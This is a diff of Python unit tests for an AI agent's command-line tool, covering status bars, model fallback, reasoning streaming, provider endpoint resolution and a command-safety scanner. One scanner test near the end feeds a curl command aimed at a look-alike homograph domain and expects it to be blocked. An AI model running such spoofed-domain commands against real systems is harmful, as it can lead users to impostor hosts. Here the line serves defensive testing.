with patch("prompt_toolkit.application.get_app", side_effect=Exception("no app")), \
|
||||
patch("shutil.get_terminal_size", return_value=MagicMock(columns=100)) as mock_shutil:
|
||||
frags = cli_obj._get_status_bar_fragments()
|
||||
|
||||
mock_shutil.assert_called()
|
||||
assert len(frags) > 0
|
||||
|
||||
def test_build_status_bar_text_uses_pt_width(self):
|
||||
"""_build_status_bar_text() must also prefer prompt_toolkit width."""
|
||||
from unittest.mock import MagicMock, patch
|
||||
cli_obj = self._make_wide_cli()
|
||||
|
||||
mock_app = MagicMock()
|
||||
mock_app.output.get_size.return_value = MagicMock(columns=80)
|
||||
|
||||
with patch("prompt_toolkit.application.get_app", return_value=mock_app), \
|
||||
patch("shutil.get_terminal_size") as mock_shutil:
|
||||
text = cli_obj._build_status_bar_text() # no explicit width
|
||||
|
||||
mock_shutil.assert_not_called()
|
||||
assert isinstance(text, str)
|
||||
assert len(text) > 0
|
||||
|
||||
def test_explicit_width_skips_pt_lookup(self):
|
||||
"""An explicit width= argument must bypass both PT and shutil lookups."""
|
||||
from unittest.mock import patch
|
||||
cli_obj = self._make_wide_cli()
|
||||
|
||||
with patch("prompt_toolkit.application.get_app") as mock_get_app, \
|
||||
patch("shutil.get_terminal_size") as mock_shutil:
|
||||
text = cli_obj._build_status_bar_text(width=100)
|
||||
|
||||
mock_get_app.assert_not_called()
|
||||
mock_shutil.assert_not_called()
|
||||
assert len(text) > 0
|
||||
|
||||
@@ -1,89 +0,0 @@
|
||||
"""Tests that _try_activate_fallback updates the context compressor."""
|
||||
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from run_agent import AIAgent
|
||||
from agent.context_compressor import ContextCompressor
|
||||
|
||||
|
||||
def _make_agent_with_compressor() -> AIAgent:
|
||||
"""Build a minimal AIAgent with a context_compressor, skipping __init__."""
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
|
||||
# Primary model settings
|
||||
agent.model = "primary-model"
|
||||
agent.provider = "openrouter"
|
||||
agent.base_url = "https://openrouter.ai/api/v1"
|
||||
agent.api_key = "sk-primary"
|
||||
agent.api_mode = "chat_completions"
|
||||
agent.client = MagicMock()
|
||||
agent.quiet_mode = True
|
||||
|
||||
# Fallback config
|
||||
agent._fallback_activated = False
|
||||
agent._fallback_model = {
|
||||
"provider": "openai",
|
||||
"model": "gpt-4o",
|
||||
}
|
||||
|
||||
# Context compressor with primary model values
|
||||
compressor = ContextCompressor(
|
||||
model="primary-model",
|
||||
threshold_percent=0.50,
|
||||
base_url="https://openrouter.ai/api/v1",
|
||||
api_key="sk-primary",
|
||||
provider="openrouter",
|
||||
quiet_mode=True,
|
||||
)
|
||||
agent.context_compressor = compressor
|
||||
|
||||
return agent
|
||||
|
||||
|
||||
@patch("agent.auxiliary_client.resolve_provider_client")
|
||||
@patch("agent.model_metadata.get_model_context_length", return_value=128_000)
|
||||
def test_compressor_updated_on_fallback(mock_ctx_len, mock_resolve):
|
||||
"""After fallback activation, the compressor must reflect the fallback model."""
|
||||
agent = _make_agent_with_compressor()
|
||||
|
||||
assert agent.context_compressor.model == "primary-model"
|
||||
|
||||
fb_client = MagicMock()
|
||||
fb_client.base_url = "https://api.openai.com/v1"
|
||||
fb_client.api_key = "sk-fallback"
|
||||
mock_resolve.return_value = (fb_client, None)
|
||||
|
||||
agent._is_direct_openai_url = lambda url: "api.openai.com" in url
|
||||
agent._emit_status = lambda msg: None
|
||||
|
||||
result = agent._try_activate_fallback()
|
||||
|
||||
assert result is True
|
||||
assert agent._fallback_activated is True
|
||||
|
||||
c = agent.context_compressor
|
||||
assert c.model == "gpt-4o"
|
||||
assert c.base_url == "https://api.openai.com/v1"
|
||||
assert c.api_key == "sk-fallback"
|
||||
assert c.provider == "openai"
|
||||
assert c.context_length == 128_000
|
||||
assert c.threshold_tokens == int(128_000 * c.threshold_percent)
|
||||
|
||||
|
||||
@patch("agent.auxiliary_client.resolve_provider_client")
|
||||
@patch("agent.model_metadata.get_model_context_length", return_value=128_000)
|
||||
def test_compressor_not_present_does_not_crash(mock_ctx_len, mock_resolve):
|
||||
"""If the agent has no compressor, fallback should still succeed."""
|
||||
agent = _make_agent_with_compressor()
|
||||
agent.context_compressor = None
|
||||
|
||||
fb_client = MagicMock()
|
||||
fb_client.base_url = "https://api.openai.com/v1"
|
||||
fb_client.api_key = "sk-fallback"
|
||||
mock_resolve.return_value = (fb_client, None)
|
||||
|
||||
agent._is_direct_openai_url = lambda url: "api.openai.com" in url
|
||||
agent._emit_status = lambda msg: None
|
||||
|
||||
result = agent._try_activate_fallback()
|
||||
assert result is True
|
||||
@@ -69,12 +69,10 @@ class TestFormatContextPressure:
|
||||
assert isinstance(result, str)
|
||||
|
||||
def test_over_100_percent_capped(self):
|
||||
"""Progress > 1.0 should cap both bar and percentage text at 100%."""
|
||||
"""Progress > 1.0 should not break the bar."""
|
||||
line = format_context_pressure(1.05, 100_000, 0.50)
|
||||
assert "▰" in line
|
||||
assert line.count("▰") == 20
|
||||
assert "100%" in line
|
||||
assert "105%" not in line
|
||||
|
||||
|
||||
class TestFormatContextPressureGateway:
|
||||
@@ -102,13 +100,6 @@ class TestFormatContextPressureGateway:
|
||||
msg = format_context_pressure_gateway(0.80, 0.50)
|
||||
assert "▰" in msg
|
||||
|
||||
def test_over_100_percent_capped(self):
|
||||
"""Progress > 1.0 should cap percentage text at 100%."""
|
||||
msg = format_context_pressure_gateway(1.09, 0.50)
|
||||
assert "100% to compaction" in msg
|
||||
assert "109%" not in msg
|
||||
assert msg.count("▰") == 20
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AIAgent context pressure flag tests
|
||||
|
||||
@@ -226,42 +226,6 @@ class TestPluginHooks:
|
||||
# Should not raise despite 1/0
|
||||
mgr.invoke_hook("post_tool_call", tool_name="x", args={}, result="r", task_id="")
|
||||
|
||||
def test_hook_return_values_collected(self, tmp_path, monkeypatch):
|
||||
"""invoke_hook() collects non-None return values from callbacks."""
|
||||
plugins_dir = tmp_path / "hermes_test" / "plugins"
|
||||
_make_plugin_dir(
|
||||
plugins_dir, "ctx_plugin",
|
||||
register_body=(
|
||||
'ctx.register_hook("pre_llm_call", '
|
||||
'lambda **kw: {"context": "memory from plugin"})'
|
||||
),
|
||||
)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes_test"))
|
||||
|
||||
mgr = PluginManager()
|
||||
mgr.discover_and_load()
|
||||
|
||||
results = mgr.invoke_hook("pre_llm_call", session_id="s1", user_message="hi",
|
||||
conversation_history=[], is_first_turn=True, model="test")
|
||||
assert len(results) == 1
|
||||
assert results[0] == {"context": "memory from plugin"}
|
||||
|
||||
def test_hook_none_returns_excluded(self, tmp_path, monkeypatch):
|
||||
"""invoke_hook() excludes None returns from the result list."""
|
||||
plugins_dir = tmp_path / "hermes_test" / "plugins"
|
||||
_make_plugin_dir(
|
||||
plugins_dir, "none_hook",
|
||||
register_body='ctx.register_hook("post_llm_call", lambda **kw: None)',
|
||||
)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes_test"))
|
||||
|
||||
mgr = PluginManager()
|
||||
mgr.discover_and_load()
|
||||
|
||||
results = mgr.invoke_hook("post_llm_call", session_id="s1",
|
||||
user_message="hi", assistant_response="bye", model="test")
|
||||
assert results == []
|
||||
|
||||
def test_invalid_hook_name_warns(self, tmp_path, monkeypatch, caplog):
|
||||
"""Registering an unknown hook name logs a warning."""
|
||||
plugins_dir = tmp_path / "hermes_test" / "plugins"
|
||||
|
||||
@@ -472,7 +472,6 @@ class TestInlineThinkBlockExtraction(unittest.TestCase):
|
||||
agent._extract_reasoning = AIAgent._extract_reasoning.__get__(agent)
|
||||
agent.verbose_logging = False
|
||||
agent.reasoning_callback = None
|
||||
agent.stream_delta_callback = None # non-streaming by default
|
||||
return agent
|
||||
|
||||
def test_single_think_block_extracted(self):
|
||||
@@ -606,159 +605,5 @@ class TestEndToEndPipeline(unittest.TestCase):
|
||||
self.assertIsNone(result["last_reasoning"])
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Duplicate reasoning box prevention (Bug fix: 3 boxes for 1 reasoning)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestReasoningDeltasFiredFlag(unittest.TestCase):
|
||||
"""_build_assistant_message should not re-fire reasoning_callback when
|
||||
reasoning was already streamed via _fire_reasoning_delta."""
|
||||
|
||||
def _make_agent(self):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
agent.reasoning_callback = None
|
||||
agent.stream_delta_callback = None
|
||||
agent._reasoning_deltas_fired = False
|
||||
agent.verbose_logging = False
|
||||
return agent
|
||||
|
||||
def test_fire_reasoning_delta_sets_flag(self):
|
||||
agent = self._make_agent()
|
||||
captured = []
|
||||
agent.reasoning_callback = lambda t: captured.append(t)
|
||||
self.assertFalse(agent._reasoning_deltas_fired)
|
||||
agent._fire_reasoning_delta("thinking...")
|
||||
self.assertTrue(agent._reasoning_deltas_fired)
|
||||
self.assertEqual(captured, ["thinking..."])
|
||||
|
||||
def test_build_assistant_message_skips_callback_when_already_streamed(self):
|
||||
"""When streaming already fired reasoning deltas, the post-stream
|
||||
_build_assistant_message should NOT re-fire the callback."""
|
||||
agent = self._make_agent()
|
||||
captured = []
|
||||
agent.reasoning_callback = lambda t: captured.append(t)
|
||||
agent.stream_delta_callback = lambda t: None # streaming is active
|
||||
|
||||
# Simulate streaming having fired reasoning
|
||||
agent._reasoning_deltas_fired = True
|
||||
|
||||
msg = SimpleNamespace(
|
||||
content="I'll merge that.",
|
||||
tool_calls=None,
|
||||
reasoning_content="Let me merge the PR.",
|
||||
reasoning=None,
|
||||
reasoning_details=None,
|
||||
)
|
||||
agent._build_assistant_message(msg, "stop")
|
||||
|
||||
# Callback should NOT have been fired again
|
||||
self.assertEqual(captured, [])
|
||||
|
||||
def test_build_assistant_message_skips_callback_when_streaming_active(self):
|
||||
"""When streaming is active, callback should NEVER fire from
|
||||
_build_assistant_message — reasoning was already displayed during the
|
||||
stream (either via reasoning_content deltas or content tag extraction).
|
||||
Any missed reasoning is caught by the CLI post-response fallback."""
|
||||
agent = self._make_agent()
|
||||
captured = []
|
||||
agent.reasoning_callback = lambda t: captured.append(t)
|
||||
agent.stream_delta_callback = lambda t: None # streaming active
|
||||
|
||||
# Even though _reasoning_deltas_fired is False (reasoning came through
|
||||
# content tags, not reasoning_content deltas), callback should not fire
|
||||
agent._reasoning_deltas_fired = False
|
||||
|
||||
msg = SimpleNamespace(
|
||||
content="I'll merge that.",
|
||||
tool_calls=None,
|
||||
reasoning_content="Let me merge the PR.",
|
||||
reasoning=None,
|
||||
reasoning_details=None,
|
||||
)
|
||||
agent._build_assistant_message(msg, "stop")
|
||||
|
||||
# Callback should NOT fire — streaming is active
|
||||
self.assertEqual(captured, [])
|
||||
|
||||
def test_build_assistant_message_fires_callback_without_streaming(self):
|
||||
"""When no streaming is active, callback always fires for structured
|
||||
reasoning."""
|
||||
agent = self._make_agent()
|
||||
captured = []
|
||||
agent.reasoning_callback = lambda t: captured.append(t)
|
||||
# No streaming
|
||||
agent.stream_delta_callback = None
|
||||
agent._reasoning_deltas_fired = False
|
||||
|
||||
msg = SimpleNamespace(
|
||||
content="I'll merge that.",
|
||||
tool_calls=None,
|
||||
reasoning_content="Let me merge the PR.",
|
||||
reasoning=None,
|
||||
reasoning_details=None,
|
||||
)
|
||||
agent._build_assistant_message(msg, "stop")
|
||||
|
||||
self.assertEqual(captured, ["Let me merge the PR."])
|
||||
|
||||
|
||||
class TestReasoningShownThisTurnFlag(unittest.TestCase):
|
||||
"""Post-response reasoning display should be suppressed when reasoning
|
||||
was already shown during streaming in a tool-calling loop."""
|
||||
|
||||
def _make_cli(self):
|
||||
from cli import HermesCLI
|
||||
cli = HermesCLI.__new__(HermesCLI)
|
||||
cli.show_reasoning = True
|
||||
cli.streaming_enabled = True
|
||||
cli._stream_box_opened = False
|
||||
cli._reasoning_box_opened = False
|
||||
cli._reasoning_stream_started = False
|
||||
cli._reasoning_shown_this_turn = False
|
||||
cli._reasoning_buf = ""
|
||||
cli._stream_buf = ""
|
||||
cli._stream_started = False
|
||||
cli._stream_text_ansi = ""
|
||||
cli._stream_prefilt = ""
|
||||
cli._in_reasoning_block = False
|
||||
cli._reasoning_preview_buf = ""
|
||||
return cli
|
||||
|
||||
@patch("cli._cprint")
|
||||
def test_streaming_reasoning_sets_turn_flag(self, mock_cprint):
|
||||
cli = self._make_cli()
|
||||
self.assertFalse(cli._reasoning_shown_this_turn)
|
||||
cli._stream_reasoning_delta("Thinking about it...")
|
||||
self.assertTrue(cli._reasoning_shown_this_turn)
|
||||
|
||||
@patch("cli._cprint")
|
||||
def test_turn_flag_survives_reset_stream_state(self, mock_cprint):
|
||||
"""_reasoning_shown_this_turn must NOT be cleared by
|
||||
_reset_stream_state (called at intermediate turn boundaries)."""
|
||||
cli = self._make_cli()
|
||||
cli._stream_reasoning_delta("Thinking...")
|
||||
self.assertTrue(cli._reasoning_shown_this_turn)
|
||||
|
||||
# Simulate intermediate turn boundary (tool call)
|
||||
cli._reset_stream_state()
|
||||
|
||||
# Flag must persist
|
||||
self.assertTrue(cli._reasoning_shown_this_turn)
|
||||
|
||||
@patch("cli._cprint")
|
||||
def test_turn_flag_cleared_before_new_turn(self, mock_cprint):
|
||||
"""The turn flag should be reset at the start of a new user turn.
|
||||
This happens outside _reset_stream_state, at the call site."""
|
||||
cli = self._make_cli()
|
||||
cli._reasoning_shown_this_turn = True
|
||||
|
||||
# Simulate new user turn setup
|
||||
cli._reset_stream_state()
|
||||
cli._reasoning_shown_this_turn = False # done by process_input
|
||||
|
||||
self.assertFalse(cli._reasoning_shown_this_turn)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
|
||||
+14
-84
@@ -584,38 +584,6 @@ class TestBuildSystemPrompt:
|
||||
# Should contain current date info like "Conversation started:"
|
||||
assert "Conversation started:" in prompt
|
||||
|
||||
def test_skills_prompt_derives_available_toolsets_from_loaded_tools(self):
|
||||
tools = _make_tool_defs("web_search", "skills_list", "skill_view", "skill_manage")
|
||||
toolset_map = {
|
||||
"web_search": "web",
|
||||
"skills_list": "skills",
|
||||
"skill_view": "skills",
|
||||
"skill_manage": "skills",
|
||||
}
|
||||
|
||||
with (
|
||||
patch("run_agent.get_tool_definitions", return_value=tools),
|
||||
patch(
|
||||
"run_agent.check_toolset_requirements",
|
||||
side_effect=AssertionError("should not re-check toolset requirements"),
|
||||
),
|
||||
patch("run_agent.get_toolset_for_tool", create=True, side_effect=toolset_map.get),
|
||||
patch("run_agent.build_skills_system_prompt", return_value="SKILLS_PROMPT") as mock_skills,
|
||||
patch("run_agent.OpenAI"),
|
||||
):
|
||||
agent = AIAgent(
|
||||
api_key="test-k...7890",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
|
||||
prompt = agent._build_system_prompt()
|
||||
|
||||
assert "SKILLS_PROMPT" in prompt
|
||||
assert mock_skills.call_args.kwargs["available_tools"] == set(toolset_map)
|
||||
assert mock_skills.call_args.kwargs["available_toolsets"] == {"web", "skills"}
|
||||
|
||||
|
||||
class TestInvalidateSystemPrompt:
|
||||
def test_clears_cache(self, agent):
|
||||
@@ -637,7 +605,7 @@ class TestBuildApiKwargs:
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["model"] == agent.model
|
||||
assert kwargs["messages"] is messages
|
||||
assert kwargs["timeout"] == 1800.0
|
||||
assert kwargs["timeout"] == 900.0
|
||||
|
||||
def test_provider_preferences_injected(self, agent):
|
||||
agent.providers_allowed = ["Anthropic"]
|
||||
@@ -1372,11 +1340,19 @@ class TestRunConversation:
|
||||
assert result["final_response"] == "Recovered after compression"
|
||||
assert result["completed"] is True
|
||||
|
||||
def test_length_finish_reason_requests_continuation(self, agent):
|
||||
"""Normal truncation (partial real content) triggers continuation."""
|
||||
@pytest.mark.parametrize(
|
||||
("first_content", "second_content", "expected_final"),
|
||||
[
|
||||
("Part 1 ", "Part 2", "Part 1 Part 2"),
|
||||
("<think>internal reasoning</think>", "Recovered final answer", "Recovered final answer"),
|
||||
],
|
||||
)
|
||||
def test_length_finish_reason_requests_continuation(
|
||||
self, agent, first_content, second_content, expected_final
|
||||
):
|
||||
self._setup_agent(agent)
|
||||
first = _mock_response(content="Part 1 ", finish_reason="length")
|
||||
second = _mock_response(content="Part 2", finish_reason="stop")
|
||||
first = _mock_response(content=first_content, finish_reason="length")
|
||||
second = _mock_response(content=second_content, finish_reason="stop")
|
||||
agent.client.chat.completions.create.side_effect = [first, second]
|
||||
|
||||
with (
|
||||
@@ -1388,58 +1364,12 @@ class TestRunConversation:
|
||||
|
||||
assert result["completed"] is True
|
||||
assert result["api_calls"] == 2
|
||||
assert result["final_response"] == "Part 1 Part 2"
|
||||
assert result["final_response"] == expected_final
|
||||
|
||||
second_call_messages = agent.client.chat.completions.create.call_args_list[1].kwargs["messages"]
|
||||
assert second_call_messages[-1]["role"] == "user"
|
||||
assert "truncated by the output length limit" in second_call_messages[-1]["content"]
|
||||
|
||||
def test_length_thinking_exhausted_skips_continuation(self, agent):
|
||||
"""When finish_reason='length' but content is only thinking, skip retries."""
|
||||
self._setup_agent(agent)
|
||||
resp = _mock_response(
|
||||
content="<think>internal reasoning</think>",
|
||||
finish_reason="length",
|
||||
)
|
||||
agent.client.chat.completions.create.return_value = resp
|
||||
|
||||
with (
|
||||
patch.object(agent, "_persist_session"),
|
||||
patch.object(agent, "_save_trajectory"),
|
||||
patch.object(agent, "_cleanup_task_resources"),
|
||||
):
|
||||
result = agent.run_conversation("hello")
|
||||
|
||||
# Should return immediately — no continuation, only 1 API call
|
||||
assert result["completed"] is False
|
||||
assert result["api_calls"] == 1
|
||||
assert "reasoning" in result["error"].lower()
|
||||
assert "output tokens" in result["error"].lower()
|
||||
# Should have a user-friendly response (not None)
|
||||
assert result["final_response"] is not None
|
||||
assert "Thinking Budget Exhausted" in result["final_response"]
|
||||
assert "/thinkon" in result["final_response"]
|
||||
|
||||
def test_length_empty_content_detected_as_thinking_exhausted(self, agent):
|
||||
"""When finish_reason='length' and content is None/empty, detect exhaustion."""
|
||||
self._setup_agent(agent)
|
||||
resp = _mock_response(content=None, finish_reason="length")
|
||||
agent.client.chat.completions.create.return_value = resp
|
||||
|
||||
with (
|
||||
patch.object(agent, "_persist_session"),
|
||||
patch.object(agent, "_save_trajectory"),
|
||||
patch.object(agent, "_cleanup_task_resources"),
|
||||
):
|
||||
result = agent.run_conversation("hello")
|
||||
|
||||
assert result["completed"] is False
|
||||
assert result["api_calls"] == 1
|
||||
assert "reasoning" in result["error"].lower()
|
||||
# User-friendly message is returned
|
||||
assert result["final_response"] is not None
|
||||
assert "Thinking Budget Exhausted" in result["final_response"]
|
||||
|
||||
|
||||
class TestRetryExhaustion:
|
||||
"""Regression: retry_count > max_retries was dead code (off-by-one).
|
||||
|
||||
@@ -493,22 +493,22 @@ def test_minimax_default_url_uses_anthropic_messages(monkeypatch):
|
||||
assert resolved["base_url"] == "https://api.minimax.io/anthropic"
|
||||
|
||||
|
||||
def test_minimax_v1_url_uses_chat_completions(monkeypatch):
|
||||
"""MiniMax with /v1 base URL should use chat_completions (user override for regions where /anthropic 404s)."""
|
||||
def test_minimax_stale_v1_url_auto_corrected(monkeypatch):
|
||||
"""MiniMax with stale /v1 base URL should be auto-corrected to /anthropic."""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "minimax")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("MINIMAX_API_KEY", "test-minimax-key")
|
||||
monkeypatch.setenv("MINIMAX_BASE_URL", "https://api.minimax.chat/v1")
|
||||
monkeypatch.setenv("MINIMAX_BASE_URL", "https://api.minimax.io/v1")
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="minimax")
|
||||
|
||||
assert resolved["provider"] == "minimax"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["base_url"] == "https://api.minimax.chat/v1"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["base_url"] == "https://api.minimax.io/anthropic"
|
||||
|
||||
|
||||
def test_minimax_cn_v1_url_uses_chat_completions(monkeypatch):
|
||||
"""MiniMax-CN with /v1 base URL should use chat_completions (user override)."""
|
||||
def test_minimax_cn_stale_v1_url_auto_corrected(monkeypatch):
|
||||
"""MiniMax-CN with stale /v1 base URL should be auto-corrected to /anthropic."""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "minimax-cn")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("MINIMAX_CN_API_KEY", "test-minimax-cn-key")
|
||||
@@ -517,8 +517,8 @@ def test_minimax_cn_v1_url_uses_chat_completions(monkeypatch):
|
||||
resolved = rp.resolve_runtime_provider(requested="minimax-cn")
|
||||
|
||||
assert resolved["provider"] == "minimax-cn"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["base_url"] == "https://api.minimaxi.com/v1"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["base_url"] == "https://api.minimaxi.com/anthropic"
|
||||
|
||||
|
||||
def test_minimax_explicit_api_mode_respected(monkeypatch):
|
||||
@@ -534,8 +534,8 @@ def test_minimax_explicit_api_mode_respected(monkeypatch):
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
|
||||
|
||||
def test_alibaba_default_coding_intl_endpoint_uses_chat_completions(monkeypatch):
|
||||
"""Alibaba default coding-intl /v1 URL should use chat_completions mode."""
|
||||
def test_alibaba_default_anthropic_endpoint_uses_anthropic_messages(monkeypatch):
|
||||
"""Alibaba with default /apps/anthropic URL should use anthropic_messages mode."""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "alibaba")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("DASHSCOPE_API_KEY", "test-dashscope-key")
|
||||
@@ -544,22 +544,22 @@ def test_alibaba_default_coding_intl_endpoint_uses_chat_completions(monkeypatch)
|
||||
resolved = rp.resolve_runtime_provider(requested="alibaba")
|
||||
|
||||
assert resolved["provider"] == "alibaba"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["base_url"] == "https://coding-intl.dashscope.aliyuncs.com/v1"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["base_url"] == "https://dashscope-intl.aliyuncs.com/apps/anthropic"
|
||||
|
||||
|
||||
def test_alibaba_anthropic_endpoint_override_uses_anthropic_messages(monkeypatch):
|
||||
"""Alibaba with /apps/anthropic URL override should auto-detect anthropic_messages mode."""
|
||||
def test_alibaba_openai_compatible_v1_endpoint_stays_chat_completions(monkeypatch):
|
||||
"""Alibaba with /v1 coding endpoint should use chat_completions mode."""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "alibaba")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("DASHSCOPE_API_KEY", "test-dashscope-key")
|
||||
monkeypatch.setenv("DASHSCOPE_BASE_URL", "https://coding-intl.dashscope.aliyuncs.com/apps/anthropic")
|
||||
monkeypatch.setenv("DASHSCOPE_BASE_URL", "https://coding-intl.dashscope.aliyuncs.com/v1")
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="alibaba")
|
||||
|
||||
assert resolved["provider"] == "alibaba"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["base_url"] == "https://coding-intl.dashscope.aliyuncs.com/apps/anthropic"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["base_url"] == "https://coding-intl.dashscope.aliyuncs.com/v1"
|
||||
|
||||
|
||||
def test_named_custom_provider_anthropic_api_mode(monkeypatch):
|
||||
|
||||
@@ -532,121 +532,6 @@ class TestStreamingFallback:
|
||||
mock_non_stream.assert_called_once()
|
||||
assert mock_close.call_count >= 1
|
||||
|
||||
@patch("run_agent.AIAgent._interruptible_api_call")
|
||||
@patch("run_agent.AIAgent._create_request_openai_client")
|
||||
@patch("run_agent.AIAgent._close_request_openai_client")
|
||||
def test_sse_connection_lost_retried_as_transient(self, mock_close, mock_create, mock_non_stream):
|
||||
"""SSE 'Network connection lost' (APIError w/ no status_code) retries like httpx errors.
|
||||
|
||||
OpenRouter sends {"error":{"message":"Network connection lost."}} as an SSE
|
||||
event when the upstream stream drops. The OpenAI SDK raises APIError from
|
||||
this. It should be retried at the streaming level, same as httpx connection
|
||||
errors, before falling back to non-streaming.
|
||||
"""
|
||||
from run_agent import AIAgent
|
||||
import httpx
|
||||
|
||||
# Create an APIError that mimics what the OpenAI SDK raises from SSE error events.
|
||||
# Key: no status_code attribute (unlike APIStatusError which has one).
|
||||
from openai import APIError as OAIAPIError
|
||||
sse_error = OAIAPIError(
|
||||
message="Network connection lost.",
|
||||
request=httpx.Request("POST", "https://openrouter.ai/api/v1/chat/completions"),
|
||||
body={"message": "Network connection lost."},
|
||||
)
|
||||
|
||||
mock_client = MagicMock()
|
||||
mock_client.chat.completions.create.side_effect = sse_error
|
||||
mock_create.return_value = mock_client
|
||||
|
||||
fallback_response = SimpleNamespace(
|
||||
id="fallback",
|
||||
model="test",
|
||||
choices=[SimpleNamespace(
|
||||
index=0,
|
||||
message=SimpleNamespace(
|
||||
role="assistant",
|
||||
content="fallback after SSE retries",
|
||||
tool_calls=None,
|
||||
reasoning_content=None,
|
||||
),
|
||||
finish_reason="stop",
|
||||
)],
|
||||
usage=None,
|
||||
)
|
||||
mock_non_stream.return_value = fallback_response
|
||||
|
||||
agent = AIAgent(
|
||||
model="test/model",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
agent.api_mode = "chat_completions"
|
||||
agent._interrupt_requested = False
|
||||
|
||||
response = agent._interruptible_streaming_api_call({})
|
||||
|
||||
assert response.choices[0].message.content == "fallback after SSE retries"
|
||||
# Should retry 3 times (default HERMES_STREAM_RETRIES=2 → 3 attempts)
|
||||
# before falling back to non-streaming
|
||||
assert mock_client.chat.completions.create.call_count == 3
|
||||
mock_non_stream.assert_called_once()
|
||||
# Connection cleanup should happen for each failed retry
|
||||
assert mock_close.call_count >= 2
|
||||
|
||||
@patch("run_agent.AIAgent._interruptible_api_call")
|
||||
@patch("run_agent.AIAgent._create_request_openai_client")
|
||||
@patch("run_agent.AIAgent._close_request_openai_client")
|
||||
def test_sse_non_connection_error_falls_back_immediately(self, mock_close, mock_create, mock_non_stream):
|
||||
"""SSE errors that aren't connection-related still fall back immediately (no stream retry)."""
|
||||
from run_agent import AIAgent
|
||||
import httpx
|
||||
|
||||
from openai import APIError as OAIAPIError
|
||||
sse_error = OAIAPIError(
|
||||
message="Invalid model configuration.",
|
||||
request=httpx.Request("POST", "https://openrouter.ai/api/v1/chat/completions"),
|
||||
body={"message": "Invalid model configuration."},
|
||||
)
|
||||
|
||||
mock_client = MagicMock()
|
||||
mock_client.chat.completions.create.side_effect = sse_error
|
||||
mock_create.return_value = mock_client
|
||||
|
||||
fallback_response = SimpleNamespace(
|
||||
id="fallback",
|
||||
model="test",
|
||||
choices=[SimpleNamespace(
|
||||
index=0,
|
||||
message=SimpleNamespace(
|
||||
role="assistant",
|
||||
content="fallback no retry",
|
||||
tool_calls=None,
|
||||
reasoning_content=None,
|
||||
),
|
||||
finish_reason="stop",
|
||||
)],
|
||||
usage=None,
|
||||
)
|
||||
mock_non_stream.return_value = fallback_response
|
||||
|
||||
agent = AIAgent(
|
||||
model="test/model",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
agent.api_mode = "chat_completions"
|
||||
agent._interrupt_requested = False
|
||||
|
||||
response = agent._interruptible_streaming_api_call({})
|
||||
|
||||
assert response.choices[0].message.content == "fallback no retry"
|
||||
# Should NOT retry — goes straight to non-streaming fallback
|
||||
assert mock_client.chat.completions.create.call_count == 1
|
||||
mock_non_stream.assert_called_once()
|
||||
|
||||
|
||||
# ── Test: Reasoning Streaming ────────────────────────────────────────────
|
||||
|
||||
|
||||
@@ -95,49 +95,23 @@ class TestTirithAllowSafeCommand:
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestTirithBlock:
|
||||
"""Tirith 'block' is now treated as an approvable warning (not a hard block).
|
||||
|
||||
Users are prompted with the tirith findings and can approve if they
|
||||
understand the risk. The prompt defaults to deny, so if no input is
|
||||
provided the command is still blocked — but through the approval flow,
|
||||
not a hard block bypass.
|
||||
"""
|
||||
|
||||
@patch(_TIRITH_PATCH,
|
||||
return_value=_tirith_result("block", summary="homograph detected"))
|
||||
def test_tirith_block_prompts_user(self, mock_tirith):
|
||||
"""tirith block goes through approval flow (user gets prompted)."""
|
||||
def test_tirith_block_safe_command(self, mock_tirith):
|
||||
os.environ["HERMES_INTERACTIVE"] = "1"
|
||||
result = check_all_command_guards("curl http://gооgle.com", "local")
|
||||
# Default is deny (no input → timeout → deny), so still blocked
|
||||
assert result["approved"] is False
|
||||
# But through the approval flow, not a hard block — message says
|
||||
# "User denied" rather than "Command blocked by security scan"
|
||||
assert "denied" in result["message"].lower() or "BLOCKED" in result["message"]
|
||||
assert "BLOCKED" in result["message"]
|
||||
assert "homograph" in result["message"]
|
||||
|
||||
@patch(_TIRITH_PATCH,
|
||||
return_value=_tirith_result("block", summary="terminal injection"))
|
||||
def test_tirith_block_plus_dangerous_prompts_combined(self, mock_tirith):
|
||||
